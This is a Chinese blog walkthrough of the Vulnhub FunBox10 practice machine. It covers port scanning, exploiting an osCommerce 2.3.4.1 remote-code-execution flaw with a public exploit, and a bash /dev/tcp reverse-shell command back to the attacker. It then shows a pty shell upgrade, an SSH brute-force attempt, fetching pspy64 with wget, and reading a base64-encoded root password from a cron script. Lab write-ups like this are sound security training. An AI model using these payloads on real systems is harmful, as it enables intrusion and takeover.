Vulnhub靶机:FunBox10

最新推荐文章于 2024-06-01 22:25:11 发布
最新推荐文章于 2024-06-01 22:25:11 发布
阅读量443 收藏 8
点赞数 7
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/135869560
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:FunBox10(10.0.2.35)

目标:获取靶机root权限和flag

靶机下载地址:https://download.vulnhub.com/funbox/Funbox10.ova/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.35

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、25、80、110、143

在这里插入图片描述

打开网站,把网站各个功能点都点了一下,查看了一下源码都没有可利用的地方

使用dirsearch工具进行目录爆破

在这里插入图片描述

发现网站osCommerce 2.3.4.1

在这里插入图片描述

三、漏洞利用

使用searchsploit查找历史漏洞

searchsploit osCommerce 2.3.4.1

在这里插入图片描述

直接下载远程命令执行漏洞exp:php/webapps/44374.py

在这里插入图片描述

查看exp,需要修改网站url为靶机的url,还可以修改远程执行的命令

在这里插入图片描述

执行exp,执行成功

在这里插入图片描述
在这里插入图片描述

修改命令为反弹shell命令,执行exp,反弹shell成功

'''system("bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'");'''

在这里插入图片描述
在这里插入图片描述

使用python获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

没有发现特权命令和具有可利用的root权限的文件,查看/home目录发现存在4个用户,并且这几个用户的文件夹我们都没有访问权限,可以尝试使用hydra爆破ssh

在这里插入图片描述

爆破了5个小时还没爆破出来,看到剩下还有那么长的时间…

在这里插入图片描述

在主机开启apache2服务:service apache2 start

靶机使用命令wget http://10.0.2.15/pspy64,将pspy64工具上传到靶机,并运行查看靶机进程

在这里插入图片描述

发现靶机每分钟会执行/usr/share/doc/examples/cron.sh,应该是开启了计划任务

进入该文件所在的目录,发现我们并没有修改该文件的权限,查看该文件,发现base64加密的密文:LXUgcm9vdCAtcCByZnZiZ3QhIQ==

在这里插入图片描述

解密得到:-u root -p rfvbgt!!,直接得到root用户的密码

切换为root用户

在这里插入图片描述

获取flag

在这里插入图片描述

huang0c
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机Funbox10
timesleep的博客
04-07 458
vulnhub靶机Funbox10 首先我们使用kali扫描地址 然后我们对靶机地址进行端口扫描 然后我们访问80端口看下 然后我们使用dirb扫描网站目录、然后我们访问这四个目录看下 只有catalog可以访问,那我们重点就看下这里,根据版本,我们找找到了他有命令执行,参考链接https://bbs.ichunqiu.com/thread-37191-1-1.html 确认并可以访问打开hackbar 执行payload,访问页面 GET:http://127.0.0.1/catal
等效距离计算公式_实用的计算方法-架空输电线路导线线间距离计算
weixin_39631370的博客
12-24 3537
1. 10kV 及以下架空线路导线线间距离 380V及以下沿墙敷设的绝缘导线,当档距不大于20m时,其线间距离不宜小于0.2m;3kV以下架空线路,靠近杆塔的两导线间的水平距离不应小于0.5m;10kV及以下杆塔的最小线间距离如下表。笔者工作地主要属于山区,10kV线路实际档距比上表大许多,笔者根据GB 50061 7.0.3 中公式即参考第2部分35kV和66kV 架空线路导线线间距离计算公式计...
Funbox10靶机详解
weixin_44681307的博客
07-21 268
执行后发现拿到一个shell,但是这个shell权限很低,命令都不能用,就像做一个反弹shell。我wget能下载文件的原因是我在kali上开启了apache2服务,常用文件放一起就好了。我们进去这个目录看看,cat一下发现点线索,一看这就是一个base64编码的。最难的就是反弹shell,学会了一些新的反弹shell命令。文件,里面有一个jack用户的账号密码,su一下就登陆上了。进去后发现有点像一个CMS,就去搜索了一下有没有漏洞。这个靶机扫描ip并没有什么有用的东西,就不展示了。
Funbox10靶场--详细教程
qq_41245301的博客
01-25 1300
更新下载资源包下载gobustercompletion: 为指定shell生成自动完成脚本dir:文件路径/目录枚举dns:dns子域名枚举s3:枚举打开储存桶并查找存在和存储桶清单(适用aws)命令说明completion为指定shell生成自动完成脚本dir文件路径/目录枚举dnsdns子域名枚举fuzz使用模糊测试模式。替换URL、Headers和请求体中的关键词FUZZgcs使用gcs bucket枚举模式help获取任何命令的帮助信息s3。
vulnhub靶场之FunBox-10
最新发布
qq_58091216的博客
06-01 995
我们发现了一个加密的参数,是用base64加密的文件(以”==”结尾的多半是base64加密),我可以尝试解密,解码后发现是root的密码和账户,我们可以尝试登录。我们可以看到osCommerce是一个电子商务系统,而且知道它的版本是2.3.4.1,我们进行搜索相关的漏洞。通过上面的扫描,我们只扫描到一个路径/catalog,我们进行查看。我们可以看到一个python脚本,我们下载下来进行查看。因为添加执行权限需要权限,我们切换到/tmp/目录下。我们可以看到权限比较低,我们进行提升权限。
记一次Funbox10靶机的渗透测试
qq_55415442的博客
06-14 155
Funbox10靶机渗透测试
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5449
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
funbox10靶机(命令执行漏洞)
m0_66299232的博客
11-21 602
7.这次把命令换为一个可以反弹shell的命令,观察这是php网页,所以执行命令也是用php支持执行的(谷歌php执行命令函数),我们用shell-exec , bash -c 是执行的意思。5.把base_url改为靶机地址,进行访问,网页给出的是一个ls 命令的结果(29行)1.没有可利用的信息和文件,我选择上传本地脚本进行探测(github里有pspy64)2.对扫出的catalog目录进行访问,并且发现其版本号。5.尝试登录root用户,成功登录,顺利拿下!虚拟机网络链接模式:桥接模式。
Vulnhub靶机系列:De-ICE: S1.120
01-09
https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
靶机渗透练习31-Funbox10-Under Construction
hirak0的博客
04-18 1006
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-under-construction,715/ Description As always, it’s a very easy box for beginners. This works better on VitualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.49 注:靶机与Kali的IP地
VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM
LYJ20010728的博客
08-27 333
VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM题目描述环境下载FUNBOX: EASYENUM靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Boot2root in 6 steps for script-kiddies. Timeframe to root this box: 20 mins to never ever. It's on you. HINTS: Enum without sense, costs you too many time: 1.Use
vulnhub靶机FunBox
Keepb1ue的博客
09-28 3024
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 靶机:DC1 (VirtualBox) IP:192.168.56.109 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。 靶机渗透开始: 先看下手里的
VulnHub_FunBox
qq_45434762的博客
08-29 553
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
Vulnhub:FUNBOX-EASY靶机
logan_logan的博客
06-06 505
1.浏览器输入目标靶机地址打开网页; 2.端口扫描 nmap -p- 192.168.31.109 nmap -sC -sV -p 22,80,33060 192.168.31.109 3.目录枚举 扫出了好多目录,故意迷惑我们这些小可爱………… gobuster dir -u http://192.168.31.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html 4.在浏览器中打开/sto
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值